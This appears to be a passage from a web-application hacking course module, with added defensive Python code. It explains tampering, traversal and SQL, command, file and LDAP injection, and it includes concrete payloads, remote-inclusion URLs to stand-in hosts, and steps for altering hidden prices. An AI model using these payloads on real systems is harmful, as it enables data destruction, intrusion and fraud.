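As an added example, not part of the original module, the following Python reproduces the concatenated query from Figure 13.5 against an in-memory SQLite table and places the hardened version beside it: server-side validation of the input followed by a parameterized query, which also answers the "Unvalidated Input" and "SQL Injection" entries in the threat list earlier. The Users table, the allowed-username pattern and the sample inputs are constructed for the example; in a real application the password column would hold a salted hash rather than the plaintext shown here.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory Users table for the example (plaintext password
    only to mirror the figure; real storage would hold a salted hash)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (user TEXT, pwd TEXT)")
    conn.execute("INSERT INTO Users VALUES ('jason', 'springfield')")
    conn.commit()
    return conn


def login_vulnerable(conn, user, pwd):
    """The figure's pattern: the query text is assembled from raw browser input,
    so quote characters in the input change the structure of the SQL statement."""
    sql = ("select * from Users where user='" + user
           + "' and pwd='" + pwd + "'")
    return conn.execute(sql).fetchone() is not None


# Allow-list for usernames (an assumption for this example): no quotes, spaces
# or other characters the application has no reason to accept.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def login_hardened(conn, user, pwd):
    """Validate on the server, then let the driver bind the values as data."""
    if not USERNAME_RE.fullmatch(user):
        return False                      # reject instead of trying to "clean" it
    if not 1 <= len(pwd) <= 128:
        return False
    row = conn.execute(
        "select * from Users where user=? and pwd=?", (user, pwd)
    ).fetchone()
    return row is not None


def concatenation_breaks_on(conn, user):
    """Diagnostic: does an apostrophe in the username reach the SQL parser?
    True for the concatenated query (a syntax error surfaces), which is the
    same mechanism an attacker relies on; the bound query never raises here."""
    try:
        login_vulnerable(conn, user, "x")
        return False
    except sqlite3.OperationalError:
        return True
```

A legitimate name such as O'Brien is enough to show the defect: the concatenated query fails with a syntax error because the input was interpreted as SQL, while the hardened path either rejects the value at validation or binds it as data.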
Parameter/Form Tampering

- A web parameter tampering attack involves the manipulation of parameters exchanged between client and server in order to modify application data such as user credentials and permissions, price, and quantity of products
- A parameter tampering attack exploits vulnerabilities in integrity and logic validation mechanisms that may result in XSS, SQL injection, etc.
Parameter/Form Tampering

Parameter tampering is a simple form of attack aimed directly at the application's business logic. This attack takes advantage of the fact that many programmers rely on hidden or fixed fields (such as a hidden tag in a form or a parameter in a URL) as the only security measure for certain operations. To bypass this security mechanism, an attacker can change these parameters.

Detailed Description

Serving the requested files is the main function of web servers. During a web session, parameters are exchanged between the web browser and the web application in order to maintain information about the client's session, which eliminates the need to maintain a complex database on the server side. URL queries, form fields, and cookies are used to pass the parameters.

Changed parameters in form fields are the best example of parameter tampering. When a user selects an HTML page, it is stored as a form field value and transferred as an HTTP page to the web application. These values may be pre-selected (combo box, check box, radio buttons, etc.), free text, or hidden. An attacker can manipulate these values. In some extreme cases, it is just like saving the page, editing the HTML, and reloading the page in the web browser.
(Slide diagram, tampering with the URL parameters: http://www.juggybank.com/cust.asp?profile=21&debit=2500 is changed to http://www.juggybank.com/cust.asp?profile=82&debit=1500. Other parameters can be changed, including attribute parameters: http://www.juggybank.com/stat.asp?pg=531&status=view is changed to http://www.juggybank.com/stat.asp?pg=147&status=delete.)
Hidden fields that are invisible to the end user provide status information to the web application. For example, consider a product order form that includes the following hidden field:

    <input type="hidden" name="price" value="99.90">

Combo boxes, check boxes, and radio buttons are examples of pre-selected parameters used to transfer information between different pages, while allowing the user to select one of several predefined values. In a parameter tampering attack, an attacker may manipulate these values. For example, consider a form that includes the following combo box:

    <FORM METHOD=POST ACTION="xferMoney.asp">
    Source Account: <SELECT NAME="SrcAcc">
    <OPTION VALUE="123456789">******789</OPTION>
    <OPTION VALUE="868686868">******868</OPTION></SELECT>
    <BR>Amount: <INPUT NAME="Amount" SIZE=20>
    <BR>Destination Account: <INPUT NAME="DestAcc" SIZE=40>
    <BR><INPUT TYPE=SUBMIT> <INPUT TYPE=RESET>
    </FORM>
Bypassing

An attacker may bypass the need to choose between two accounts by adding another account into the HTML page source code. The new combo box is displayed in the web browser and the attacker can choose the new account.

HTML forms submit their results using one of two methods: GET or POST. In the GET method, all form parameters and their values appear in the query string of the next URL, which the user sees. An attacker may tamper with this query string. For example, consider a web page that allows an authenticated user to select one of his or her accounts from a combo box and debit the account with a fixed unit amount. When the submit button is pressed in the web browser, the following URL is requested:

    http://www.juggybank.com/cust.asp?profile=21&debit=2500

An attacker may change the URL parameters (profile and debit) in order to debit another account:

    http://www.juggybank.com/cust.asp?profile=82&debit=1500

There are other URL parameters that an attacker can modify, including attribute parameters and internal modules. Attribute parameters are unique parameters that characterize the behavior of the uploading page. For example, consider a content-sharing web application that enables the content creator to modify content, while other users can only view the content. The web server checks whether the user who is accessing an entry is the author or not (usually by cookie). An ordinary user will request the following link:

    http://www.juggybank.com/stat.asp?pg=531&status=view

An attacker can modify the status parameter to "delete" in order to delete permission for the content:

    http://www.juggybank.com/stat.asp?pg=147&status=delete

Parameter/form tampering can lead to theft of services, escalation of access, session hijacking, and assuming the identity of other users, as well as to parameters allowing access to developer and debugging information.
FIGURE 13.6: Form Tampering (tampering with the URL parameters: cust.asp?profile=21&debit=2500 changed to cust.asp?profile=82&debit=1500; other parameters can be changed, including attribute parameters: stat.asp?pg=531&status=view changed to stat.asp?pg=147&status=delete)
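Added example, written for this text rather than taken from the module: the server-side handling that defeats the tampering described in this section, in Python, for the xferMoney.asp form and the price hidden field shown above. It re-checks account ownership and the free-text amount on the server, prices the order from a server-side catalog instead of the hidden field, and shows how a value that genuinely must round-trip through a hidden field can be bound to the server with an HMAC. The account ownership table, the catalog and the server secret are constructed placeholders (the secret would come from a secrets store in practice). The same code answers the Hidden Manipulation and Parameter/Form Tampering entries in the threat list earlier.

```python
import hashlib
import hmac
from decimal import Decimal, InvalidOperation

# Constructed sample data (assumptions for this example, not from the module).
CATALOG = {"sku-100": Decimal("99.90")}          # what the hidden price field carried
USER_ACCOUNTS = {"jason": {"123456789", "868686868"}}  # accounts offered in the combo box
SERVER_SECRET = b"PLACEHOLDER-load-a-random-key-from-a-secrets-store"


def price_for(sku, submitted_price):
    """Never price an order from the client's hidden field: look the price up
    server-side and report whether the submitted value disagreed (worth logging)."""
    server_price = CATALOG[sku]
    tampered = Decimal(submitted_price) != server_price
    return server_price, tampered


def parse_amount(text):
    """Free-text 'Amount' field: must be a finite, positive money value."""
    try:
        amount = Decimal(text)
    except InvalidOperation:
        raise ValueError("amount is not a number") from None
    if not amount.is_finite() or amount <= 0 or amount.as_tuple().exponent < -2:
        raise ValueError("amount must be positive with at most two decimals")
    return amount


def transfer(session_user, form):
    """Re-check on the server everything the combo box 'guaranteed' on the client:
    a SrcAcc value is only valid if this session's user actually owns it."""
    src = form.get("SrcAcc", "")
    if src not in USER_ACCOUNTS.get(session_user, set()):
        raise PermissionError("source account is not owned by the authenticated user")
    dest = form.get("DestAcc", "")
    if not (dest.isdigit() and len(dest) == 9):
        raise ValueError("destination account is malformed")
    amount = parse_amount(form.get("Amount", ""))
    return {"from": src, "to": dest, "amount": amount}


def sign_hidden(name, value):
    """When a value really has to round-trip through a hidden field, bind it to
    the server with an HMAC so any edit in the page source is detected."""
    mac = hmac.new(SERVER_SECRET, f"{name}={value}".encode(), hashlib.sha256).hexdigest()
    return f"{value}|{mac}"


def verify_hidden(name, field):
    """Reject the field unless its MAC matches; the field name is bound in so a
    signed value cannot be replayed under a different parameter."""
    value, _, mac = field.rpartition("|")
    expected = hmac.new(SERVER_SECRET, f"{name}={value}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        raise ValueError("hidden field was tampered with")
    return value
```

The design point is that the browser's copy of any parameter (hidden field, combo-box option, query string) is advisory: the server keeps its own record of what the session may reference and what things cost, and the HMAC is only for the cases where keeping server-side state is impractical.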
Directory Traversal
When access is provided outside a defined application, there exists the possibility of unintended information disclosure or modification. Complex applications exist as application components and data, which are typically configured in multiple directories. An application has the ability to traverse these multiple directories to locate and execute the legitimate portions of an application. A directory traversal/forceful browsing attack occurs when the attacker is able to browse directories and files outside the normal application access. A directory traversal/forceful browsing attack exposes the directory structure of an application, and often the underlying web server and operating system. With this level of access to the web application architecture, an attacker can:

- Enumerate the contents of files and directories
- Access pages that otherwise require authentication (and possibly payment)
- Gain secret knowledge of the application and its construction
- Discover user IDs and passwords buried in hidden files
- Locate source code and other interesting files left on the server
- View sensitive data, such as customer information
The following example uses ".." to back up several directories and obtain a file containing a backup of the web application:

    http://www.targetsite.com/../../../sitebackup.zip

This example obtains the "/etc/passwd" file from a UNIX/Linux system, which contains user account information:

    http://www.targetsite.com/../../../../etc/passwd

Let us consider another example where an attacker tries to access files located outside the web publishing directory using directory traversal:

    http://www.juggyboy.com/process.aspx=../../some dir/some file
    http://www.juggyboy.com/../../../../some dir/some file
The pictorial representation of a directory traversal attack is shown as follows:
FIGURE 13.7: Directory Traversal (the attacker sends /../../../etc/passwd to the vulnerable server code and receives the entries of the password file)
Security Misconfiguration
Easy Exploitation
Using misconfiguration vulnerabilities, attackers gain
unauthorized access to default accounts, read
unused pages, exploit unpatched flaws, and read or
write unprotected files and directories, etc.
Common Prevalence
Security misconfiguration can occur at any level
of an application stack, including the platform,
web server, application server, framework, and
custom code
Example
- The application server admin console is automatically installed and not removed
- Default accounts are not changed
- Attacker discovers the standard admin pages on server, logs in with default passwords, and takes over
Security Misconfiguration
Developers and network administrators should check that the entire stack is
configured properly, or security misconfiguration can happen at any level of an application
stack, including the platform, web server, application server, framework, and custom code. For
instance, if the server is not configured properly, then it results in various problems that can
affect the security of a website. The problems that lead to such instances include server
software flaws, unpatched security flaws, enabling unnecessary services, and improper
authentication. A few of these problems can be detected easily with the help of automated
scanners. Attackers can access default accounts, unused pages, unpatched flaws, unprotected
files and directories, etc. to gain unauthorized access. All the unnecessary and unsafe features
have to be taken care of, and it proves very beneficial if they are completely disabled so that
outsiders don't make use of them for malicious attacks. All the application-based files have to
be taken care of through proper authentication and strong security methods, or crucial
information can be leaked to the attackers.
Examples of unnecessary features that should be disabled or changed include:
- The application server admin console is automatically installed and not removed
- Default accounts are not changed
- Attacker discovers the standard admin pages on server, logs in with default passwords,
and takes over
Injection Flaws
Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed
as part of a command or query
Attackers exploit injection flaws by constructing malicious commands or queries that result in data loss or
corruption, lack of accountability, or denial of access
Injection flaws are prevalent in legacy code, often found in SQL, LDAP, and XPath queries, etc. and can be
easily discovered by application vulnerability scanners and fuzzers
SQL Injection: It involves the injection of malicious SQL queries into user input forms
Command Injection: It involves the injection of malicious code through a web application
LDAP Injection: It involves the injection of malicious LDAP statements
Injection Flaws
Injection flaws are the loopholes in the web application that allow unreliable data to
be interpreted and executed as part of a command or query. The injection flaws are
exploited by the attacker by constructing malicious commands or queries that result in loss of
data or corruption, lack of accountability, or denial of access. Injection flaws are prevalent in
legacy code, often found in SQL, LDAP, and XPath queries, etc. These flaws can be detected
easily by application vulnerability scanners and fuzzers. By exploiting the flaws in the web
application, the attacker can easily read, write, delete, and update any data, i.e., relevant or
irrelevant to that particular application. There are many types of injection flaws; some of them
are as follows:
SQL injection
SQL injection is the most common website vulnerability on the Internet. It is the
technique used to take advantage of non-validated input vulnerabilities to pass SQL commands
through a web application for execution by a backend database. In this, the attacker injects
malicious SQL queries into the user input form, and this is usually performed either to gain
unauthorized access to a database or to retrieve information directly from the database.
Command injection
The flaws in command injection are another type of web application vulnerability.
These flaws are highly dangerous. In this type of attack, the attacker injects malicious code
via a web application.
LDAP injection
LDAP injection is an attack method in which a website that constructs LDAP
statements from user-supplied input is exploited for launching attacks. When an application
fails to sanitize the user input, then the LDAP statement can be modified with the help of a local
proxy. This in turn results in the execution of arbitrary commands, such as granting access to
unauthorized queries and altering the content inside the LDAP tree.
SQL Injection Attacks
- SQL injection attacks use a series of malicious SQL queries to directly
manipulate the database
- An attacker can use a vulnerable web application to bypass normal security
measures and obtain direct access to the valuable data
- SQL injection attacks can often be executed from the address bar, from
within application fields, and through queries and searches
SQL Injection vulnerable server code:
<?php
function save_email($user, $message)
{
    // user-controlled values are concatenated straight into the SQL text
    $sql = "INSERT INTO Messages (
        user, message
    ) VALUES (
        '$user', '$message'
    )";
    return mysql_query($sql);
}
?>
Input sent from the web browser; when this code is sent to the database server, it drops the Messages table:
test');DROP TABLE Messages;--
Input that inserts spammy data on behalf of other users:
test'),('user2','I am Jason'),('user3','You are hacked
Note: For complete coverage of SQL Injection concepts and techniques, refer to Module 14: SQL Injection
SQL Injection Attacks
SQL injection attacks use command sequences from Structured Query Language (SQL)
statements to control database data directly. Applications often use SQL statements to
authenticate users to the application, validate roles and access levels, store and obtain
information for the application and user, and link to other data sources. Using SQL injection
methods, an attacker can use a vulnerable web application to avoid normal security measures
and obtain direct access to valuable data.
The reason why SQL injection attacks work is that the application does not properly validate
input before passing it to a SQL statement. For example, the following SQL statement,
select * from tablename where UserID = 2302
becomes the following with a simple SQL injection attack:
SELECT * FROM tablename WHERE UserID = 2302 OR 1=1
The expression "OR 1=1" evaluates to the value "TRUE," often allowing the enumeration of all
user ID values from the database. SQL injection attacks can often be entered from the address
bar, from within application fields, and through queries and searches. SQL injection attacks can
allow an attacker to:
- Log in to the application without supplying valid credentials
- Perform queries against data in the database, often even data to which the application
would not normally have access
- Modify the database contents, or drop the database altogether
- Use the trust relationships established between the web application components to
access other databases
FIGURE 13.8: SQL Injection Attacks (the vulnerable save_email() server code shown above; the web browser sends test');DROP TABLE Messages;-- , which drops the Messages table when sent to the database server, or test'),('user2','I am Jason'),('user3','You are hacked to insert spammy data on behalf of other users)
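The three payloads from this section run against an in-memory SQLite database, as an added example that is not part of the CEH module: the string-built query and insert behave like the PHP save_email() above, and the parameterised versions beside them show the same inputs being treated as data. The schema is constructed for the demo, and executescript() stands in for a driver that allows stacked statements.

```python
"""Added example (not from the CEH module): the page's SQL injection payloads
against a constructed SQLite schema, built by concatenation and then bound."""
import sqlite3

# Payloads as they appear on the slide; both are sent as the "message" value here.
DROP_PAYLOAD = "test');DROP TABLE Messages;--"
SPAM_PAYLOAD = "test'),('user2','I am Jason'),('user3','You are hacked"


def fresh_db():
    """Constructed in-memory schema using the table names from the page."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Messages (user TEXT, message TEXT);
        CREATE TABLE tablename (UserID INTEGER, name TEXT);
        INSERT INTO tablename VALUES (2302, 'alice'), (2303, 'bob'), (2304, 'carol');
    """)
    return conn


def lookup_user_vulnerable(conn, user_id):
    """Builds 'select * from tablename where UserID = <input>' by concatenation,
    so the input '2302 OR 1=1' returns every row."""
    return conn.execute("SELECT * FROM tablename WHERE UserID = " + user_id).fetchall()


def lookup_user_safe(conn, user_id):
    """Type-checks the input, then binds it as a parameter; the SQL text never changes."""
    uid = int(user_id)  # raises ValueError for '2302 OR 1=1' before any SQL runs
    return conn.execute("SELECT * FROM tablename WHERE UserID = ?", (uid,)).fetchall()


def lookup_rejects(conn, user_id):
    """True when lookup_user_safe refuses the input."""
    try:
        lookup_user_safe(conn, user_id)
    except ValueError:
        return True
    return False


def save_email_vulnerable(conn, user, message):
    """Same shape as the PHP save_email(): values interpolated into the SQL text.
    executescript() is the demo's stand-in for a driver that accepts stacked
    statements, which is what lets the ';DROP TABLE' part execute."""
    sql = "INSERT INTO Messages (user, message) VALUES ('%s', '%s')" % (user, message)
    conn.executescript(sql)


def save_email_safe(conn, user, message):
    """Parameterised insert: the payload is stored as a literal string."""
    conn.execute("INSERT INTO Messages (user, message) VALUES (?, ?)", (user, message))
    conn.commit()


def table_exists(conn, name):
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)).fetchone()
    return row is not None


def messages(conn):
    return conn.execute("SELECT user, message FROM Messages ORDER BY rowid").fetchall()
```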
Command Injection Attacks
Shell Injection:
- An attacker tries to craft an input string to gain shell access to a web server
- Shell Injection functions include system(), StartProcess(),
java.lang.Runtime.exec(), System.Diagnostics.Process.Start(),
and similar APIs
HTML Embedding:
- This type of attack is used to deface websites virtually. Using this attack, an
attacker adds extra HTML-based content to the vulnerable web application
- In HTML embedding attacks, user input to a web script is placed into the output
HTML, without being checked for HTML code or scripting
File Injection:
- The attacker exploits this vulnerability and injects malicious code into system
files
- http://www.juggyboy.com/vulnerable.php?COLOR=http://evil/exploit?
Command Injection Attacks
Command injection flaws allow attackers to pass malicious code to different systems
via a web application. The attacks include calls to the operating system over system calls, use of
external programs over shell commands, and calls to the backend databases over SQL. Scripts
written in Perl, Python, and other languages can be injected into poorly designed
web applications and executed. If a web application uses any type of interpreter, attacks are inserted to inflict
damage.
To perform functions, web applications must use operating system features and external
programs. Although many programs are invoked externally, the frequently used program is
Sendmail. When a piece of information is passed through the HTTP external request, it must be
carefully scrubbed, or the attacker can insert special characters, malicious commands, and
command modifiers into the information. The web application then blindly passes these
characters to the external system for execution. SQL injection is dangerous and rather
widespread, and it is a form of command injection. Command injection attacks are easy to
carry out and discover, but they are tough to understand.
Shell Injection
To complete various functionalities, web applications use various applications and
programs. It is just like sending an email by using the UNIX sendmail program. There is
a chance that an attacker may inject code into these programs. This kind of attack is dangerous
especially to web page security. These injections allow intruders to perform various types of
malicious attacks against the user's server. An attacker tries to craft an input string to gain shell
access to a web server.
Shell injection functions include system(), StartProcess(), java.lang.Runtime.exec(),
System.Diagnostics.Process.Start(), and similar APIs.
HTML Embedding
This type of attack is used to deface websites virtually. Using this attack, an attacker
adds extra HTML-based content to the vulnerable web application. In HTML
embedding attacks, user input to a web script is placed into the output HTML, without being
checked for HTML code or scripting.
File Injection
The attacker exploits this vulnerability and injects malicious code into system files:
http://www.juggyboy.com/vulnerable.php?COLOR=http://evil/exploit
Users are allowed to upload various files on the server through various applications, and those
files can be accessed through the Internet from any part of the world. If the uploaded file ends
with a .php extension and any user requests it, then the application interprets it as a PHP script
and executes it. This allows an attacker to perform arbitrary commands.
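The sendmail case from the Shell Injection passage, as an added example that is not part of the CEH module: the concatenated shell string that lets metacharacters through, next to allow-list validation of the recipient and an argument-vector call that never involves a shell. The sendmail path is assumed, and a Python child process that echoes its argv stands in for the mailer so the block runs offline.

```python
"""Added example (not from the CEH module): validating and passing a user-supplied
recipient to an external mailer without a shell.  /usr/sbin/sendmail is assumed."""
import json
import re
import subprocess
import sys

# Allow-list for the one thing the mailer needs from the user: a plain address.
RECIPIENT_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+$")
# Characters a POSIX shell would interpret; used only as a detection aid.
SHELL_META = set(";|&$`<>()\n\"'\\")


def vulnerable_command_line(recipient):
    """The risky pattern: a shell command string built by concatenation.  Handed to
    system() or shell=True, ';', '|' and '$(...)' in the recipient become shell syntax."""
    return "/usr/sbin/sendmail " + recipient


def contains_shell_metachars(value):
    """True if the value carries characters a shell would interpret."""
    return any(ch in SHELL_META for ch in value)


def validate_recipient(recipient):
    """Allow-list validation; returns the recipient unchanged or raises ValueError."""
    if not RECIPIENT_RE.match(recipient):
        raise ValueError("recipient is not a plain e-mail address: %r" % recipient)
    if recipient.startswith("-"):
        # would otherwise be parsed by the mailer as a command-line option
        raise ValueError("recipient must not look like an option")
    return recipient


def is_valid_recipient(recipient):
    try:
        validate_recipient(recipient)
    except ValueError:
        return False
    return True


def safe_argv(recipient):
    """Argument vector for the mailer: one list element per argument, no shell."""
    return ["/usr/sbin/sendmail", validate_recipient(recipient)]


def run_without_shell(args):
    """Run a stand-in for sendmail (a Python child that echoes its argv as JSON) with
    shell=False and return the argument list the child actually received."""
    child = [sys.executable, "-c",
             "import json, sys; print(json.dumps(sys.argv[1:]))"] + list(args)
    completed = subprocess.run(child, capture_output=True, text=True, check=True)
    return json.loads(completed.stdout)
```

Because run_without_shell() passes the hostile string as a single argv element, the child sees it whole and nothing after the semicolon is ever executed.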
Command Injection Example
http://juggyboy/cgi-bin/lspro/lspro.cgi?hit_out=1036
Form fields submitted by the attacker:
User Name: Addison
Email Address: addi@juggyboy.com
Site URL: www.juggyboy.com
Banner URL: www.juggyboy.com/banner.gif|newpassword|1036|60|468
Password: newpassword
Malicious code:
www.juggyboy.com/banner.gif|newpassword|1036|60|468
- An attacker enters malicious code (account number) with a new password
- The last two sets of numbers are the banner size
- Once the attacker clicks the submit button, the password for the account 1036 is changed to
"newpassword"
- The server script assumes that only the URL of the banner image file is inserted into that field
Poor input validation at the server script was exploited in this attack, which uses the database INSERT and
UPDATE record command
Command Injection Example
The following is an example of command injection:
To perform a command injection attack, the attacker first enters malicious code (account
number) with a new password. The last two sets of numbers are the banner size. Once the
attacker clicks the submit button, the password for the account 1036 is changed to
"newpassword." The server script assumes that only the URL of the banner image file is
inserted into that field.
FIGURE 13.9: Command Injection Example (the lspro.cgi form with the malicious code www.juggyboy.com/banner.gif|newpassword|1036|60|468 entered in the Banner URL field; poor input validation at the server script was exploited in this attack, which uses the database INSERT and UPDATE record command)
File Injection Attack
Vulnerable PHP code:
<?php
$drink = 'coke';
if (isset($_GET['DRINK']))
    $drink = $_GET['DRINK'];   // user input selects the file name to include
require($drink . '.php');      // the chosen name is included without any check
?>
Client code running in a browser:
<form method="get">
  <select name="DRINK">
    <option value="pepsi">pepsi</option>
    <option value="coke">coke</option>
  </select>
  <input type="submit">
</form>
Attacker injects a remotely hosted file at www.jasoneval.com containing an exploit:
http://www.juggyboy.com/orders.php?DRINK=http://jasoneval.com/exploit?
File injection attacks enable attackers to exploit vulnerable scripts on the server to use a remote file
instead of a presumably trusted file from the local file system
File Injection Attack
Users are allowed to upload various files on the server through various applications,
and those files can be accessed through the Internet from anywhere in the world. If the
uploaded file ends with a .php extension and any user requests it, then the application
interprets it as a PHP script and executes it. This allows an attacker to perform arbitrary
commands. File injection attacks enable attackers to exploit vulnerable scripts on the server to
use a remote file instead of a presumably trusted file from the local file system. Consider the
following client code running in a browser:
<form method="get">
  <select name="DRINK">
    <option value="pepsi">pepsi</option>
    <option value="coke">coke</option>
  </select>
  <input type="submit">
</form>
Vulnerable PHP code
<?php
$drink = 'coke';
if (isset($_GET['DRINK']))
    $drink = $_GET['DRINK'];   // user input selects the file name to include
require($drink . '.php');      // the chosen name is included without any check
?>
To exploit the vulnerable PHP code, the attacker injects a remotely hosted file at
www.jasoneval.com containing an exploit.
Exploit code
http://www.juggyboy.com/orders.php?DRINK=http://jasoneval.com/exploit?
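A safe replacement for the require($drink . '.php') pattern, as an added example that is not part of the CEH module: the DRINK parameter is resolved against a fixed allow-list of local include files, so the jasoneval.com URL above is refused and logged as a remote-inclusion attempt. The include directory and the classification labels are assumptions for the demo.

```python
"""Added example (not from the CEH module): allow-list resolution of the DRINK
parameter from orders.php.  The include directory is an assumption."""
import posixpath
from urllib.parse import parse_qs, urlsplit

INCLUDE_ROOT = "/var/www/app/drinks"   # assumed directory holding coke.php and pepsi.php
# Permitted DRINK values mapped to the file each one selects; nothing else is included.
ALLOWED_INCLUDES = {"coke": "coke.php", "pepsi": "pepsi.php"}


class IncludeRefused(ValueError):
    """Raised when the DRINK parameter is not one of the known include names."""


def classify_include_value(value):
    """Label a DRINK value for logging: 'allowed', 'remote' (remote file inclusion
    attempt such as the jasoneval.com URL), 'traversal', or 'unknown'."""
    lowered = value.lower()
    if value in ALLOWED_INCLUDES:
        return "allowed"
    if "://" in lowered or lowered.startswith("//"):
        return "remote"
    if ".." in value or value.startswith("/") or "\\" in value:
        return "traversal"
    return "unknown"


def select_include(query_params):
    """Resolve DRINK against the allow-list and return the local file path,
    defaulting to coke exactly as the original script does."""
    values = query_params.get("DRINK")
    name = values[0] if values else "coke"
    if name not in ALLOWED_INCLUDES:
        raise IncludeRefused("DRINK=%r refused (%s)" % (name, classify_include_value(name)))
    return posixpath.join(INCLUDE_ROOT, ALLOWED_INCLUDES[name])


def include_for_order_url(url):
    """Parse an orders.php request URL and return the file that would be included."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return select_include(params)


def include_refused(url):
    """True when the request URL is rejected by the allow-list."""
    try:
        include_for_order_url(url)
    except IncludeRefused:
        return True
    return False
```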
What Is LDAP Injection?
An LDAP injection technique is used to take advantage of non-validated web
application input vulnerabilities to pass LDAP filters used for searching Directory
Services to obtain direct access to databases behind an LDAP tree
Filter syntax: (attributeName operator value)
Operator | Example
=        | (objectClass=user)
>=       | (mdbStorageQuota>=100000)
<=       | (mdbStorageQuota<=100000)
~=       | (displayName~=Foeckeler)
*        | (displayName=*John*)
AND (&)  | (&(objectClass=user)(displayName=John))
OR (|)   | (|(objectClass=user)(displayName=John))
NOT (!)  | (!objectClass=group)
LDAP Directory Services store and organize information based on its attributes. The information
is hierarchically organized as a tree of directory entries
LDAP is based on the client-server model and clients can search the directory entries using filters
What is LDAP Injection?
An LDAP (Lightweight Directory Access Protocol) injection attack works in the same
way as a SQL injection attack. All the inputs to the LDAP must be properly filtered, otherwise
vulnerabilities in LDAP allow executing unauthorized queries or modification of the contents.
LDAP attacks exploit web-based applications constructed based on LDAP statements by using a
local proxy. LDAP statements are modified when certain applications fail to sanitize their input.
These services store and organize information based on its attributes. The information is
hierarchically organized as a tree of directory entries. It is based on the client-server model, and
clients can search the directory entries using filters.
FIGURE 13.10: LDAP Injection (the filter syntax (attributeName operator value) and the operator examples tabulated above)
How LDAP Injection Works
Normal operation: the Client sends a Normal Query to the LDAP Server and receives the Normal Result
Operation with code injection: the Client sends a Normal Query + Code Injection to the LDAP Server and
receives the Normal Result and/or Additional Information
LDAP injection attacks are similar to SQL injection attacks but exploit user parameters to generate the LDAP query
To test if an application is vulnerable to LDAP code injection, send a query to the server that generates
an invalid input. If the LDAP server returns an error, it can be exploited with code injection techniques
If an attacker enters the valid user name "juggyboy"
and injects juggyboy)(&)), then the URL string
becomes (&(USER=juggyboy)(&))(PASS=blah)). Only
the first filter is processed by the LDAP server, so only
the query (&(USER=juggyboy)(&)) is processed.
This query is always true, and the attacker logs into
the system without a valid password
Account Login form submitted by the attacker:
Username: juggyboy)(&))
Password: blah
How LDAP Injection Works
LDAP injection attacks are commonly used on web applications. LDAP injection applies to any
of the applications that have some kind of user inputs used to generate the LDAP queries. To
test if an application is vulnerable to LDAP code injection, send a query to the server that
generates an invalid input. If the LDAP server returns an error, it can be exploited with code
injection techniques.
Depending upon the implementation of the target, one can try to achieve:
- Login Bypass
- Information Disclosure
- Privilege Escalation
- Information Alteration
FIGURE 13.11: Normal operation (the Client sends a Normal Query to the LDAP Server and receives the Normal Result)
FIGURE 13.12: Operation with code injection (the Client sends a Normal Query + Code Injection; the LDAP Server returns the Normal Result and/or Additional Information)
Attack
If an attacker enters a valid user name of "juggyboy" and injects juggyboy)(&)), then the URL
string becomes (&(USER=juggyboy)(&))(PASS=blah)). Only the first filter is processed by the
LDAP server; only the query (&(USER=juggyboy)(&)) is processed. This query is always true,
and the attacker logs into the system without a valid password.
FIGURE 13.13: Attack (the Account Login form with Username juggyboy)(&)) and Password blah; the LDAP Server receives the Normal Query + Code Injection and returns the Normal Result and/or Additional Information)
Hidden Field Manipulation Attack
Normal Request
http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=200.00
Attack Request
http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=2.00
HTML Code
<form method="post" action="page.aspx">
<input type="hidden" name="PRICE" value="200.00">
Product name: <input type="text" name="product" value="Juggyboy Shirt"><br>
Product price: 200.00<br>
<input type="submit" value="submit">
</form>
- When a user makes selections on an HTML page, the selection is typically stored as form
field values and sent to the application as an HTTP request (GET or POST)
- HTML can also store field values as hidden fields, which are not rendered to the screen by
the browser, but are collected and submitted as parameters during form submissions
- Attackers can examine the HTML code of the page and change the hidden field values in
order to change post requests to server
Form as rendered in the browser: Product Name: Juggyboy Shirt, Product Price: 200, Submit
Hidden Field Manipulation Attack
Hidden field manipulation attacks are mostly used against e-commerce websites today.
Many online stores face these problems. In every client session, developers use hidden fields to
store client information, including the price of the product (including discount rates). At the time of
development of such programs, developers feel that all the applications developed by
them are safe, but a hacker can manipulate the price of the product and complete a
transaction with the price that he or she has altered, rather than the actual price of the product.
For example: On eBay, a particular mobile phone is for sale for $1000 and the hacker, by
altering the price, gets it for only $10.
This is a huge loss for website owners. To protect their networks from attacks, website owners
are using the latest antivirus software, firewalls, intrusion detection systems, etc. If their
website is attacked, it often also loses its credibility in the market.
When any target requests web services and makes choices on the HTML page, then the choices
are saved as form field values and delivered to the requested application as an HTTP request
(GET or POST). The HTML pages generally save field values as hidden fields, and they are not
displayed on the monitor of the target but saved and placed in the form of strings or
parameters at the time of form submission. Attackers can examine the HTML code of the page
and change the hidden field values in order to change post requests to the server.
<form method="post" action="page.aspx">
<input type="hidden" name="PRICE" value="200.00">
Product name: <input type="text" name="product" value="Juggyboy Shirt"><br>
Product price: 200.00<br>
<input type="submit" value="submit">
</form>
1. Open the HTML page within an HTML editor.
2. Locate the hidden field (e.g., "<type=hidden name=price value=200.00>").
3. Modify its content to a different value (e.g., "<type=hidden name=price value=2.00>").
4. Save the HTML file locally and browse it.
5. Click the Buy button to perform electronic shoplifting via hidden manipulation.
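Two server-side defences for the page.aspx form above, as an added example that is not part of the CEH module: the price is looked up from a server-side catalogue instead of being trusted, and where a hidden price field must be round-tripped it carries an HMAC so the altered price=2.00 fails verification. The catalogue, the key and the parameter names are constructed for the demo.

```python
"""Added example (not from the CEH module): rejecting a tampered hidden price field.
Catalogue, key and parameter names are constructed for the demo."""
import hashlib
import hmac
from urllib.parse import parse_qs

# Constructed server-side catalogue: the only place a price may come from.
CATALOGUE = {"Juggyboy Shirt": "200.00"}
# Constructed secret; a real deployment keeps it out of source control and rotates it.
SERVER_KEY = b"demo-key-not-for-production"


def catalogue_price(product):
    """Preferred fix: ignore any client-supplied price and look it up server-side."""
    return CATALOGUE[product]


def sign_price(product, price, key=SERVER_KEY):
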